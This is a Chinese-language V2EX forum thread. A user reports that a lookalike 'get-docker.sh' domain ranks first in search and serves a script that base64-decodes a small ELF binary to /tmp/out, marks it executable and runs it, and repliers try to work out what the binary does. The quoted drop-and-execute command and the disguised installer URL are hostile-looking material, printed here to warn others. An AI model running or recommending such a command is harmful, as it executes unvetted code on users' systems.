谷歌搜索 get-docker.sh 第一个结果并不是 docker 官方的,貌似会执行恶意代码

105 天前
 loveshuyuan

网址是 http://get-docker.sh,打开后跳转到 http://blin.gg/get-docker.sh,返回以下代码:

#!/bin/bash
base64 -d <<< f0VMRv/A/8exBUjB4TDrBAIAPgCyA+sdBAABAAAABQAaAAAAAAAAAAAAAAABAAAABQAAsDy+OAABAEgBzusLAAAASAHO6wsAAABIg+43DwXr4Q==> /tmp/out; chmod +x /tmp/out; /tmp/out

有谁知道这是要做什么?

1364 次点击
所在节点    问与答
10 条回复
bbsingao
105 天前
base64 -d <<< f0VMRv/A/8exBUjB4TDrBAIAPgCyA+sdBAABAAAABQAaAAAAAAAAAAAAAAABAAAABQAAsDy+OAABAEgBzusLAAAASAHO6wsAAABIg+43DwXr4Q==
ELF���DZH��0�>����<�8H��
H��
H��7��
竟然是个二进制,
swulling
105 天前
为啥会想到搜索 get-docker.sh ?不应该搜索 Docker installation script 么。
Tink
105 天前
是个二进制
ELF���DZH��0�>���<�8H��
H��
H��7��%
hingle
105 天前
这么短的二进制,执行了什么操作,有没有懂的?
woyao
105 天前
从域名存活历史来看,有好几年了。
域名根目录下还有一个文件 dominion.elf
但是看了一下吧,应该是 Flare-On 2020: break

get-docker.sh 似乎不完整……
直接访问根域名吧,提示 !!! This is a research server !!!
body007
105 天前


这个有问题的恶意代码,尽然有很多国内文章里面用到了🤣🤣🤣
body007
105 天前
@body007 不好意思,点进去看不是用的这个问题网站下载,而是执行脚本名字和网站一样。
a33291
105 天前
mei'kan'dao 没看到什么有价值的操作
zwzwzwzwzxt
105 天前
为啥我这解析出来的除了前四个 Magic Number 外貌也不是有效的 ELF 文件啊
nagisaushio
105 天前
跑起来直接 segfault 了

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/1071973

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX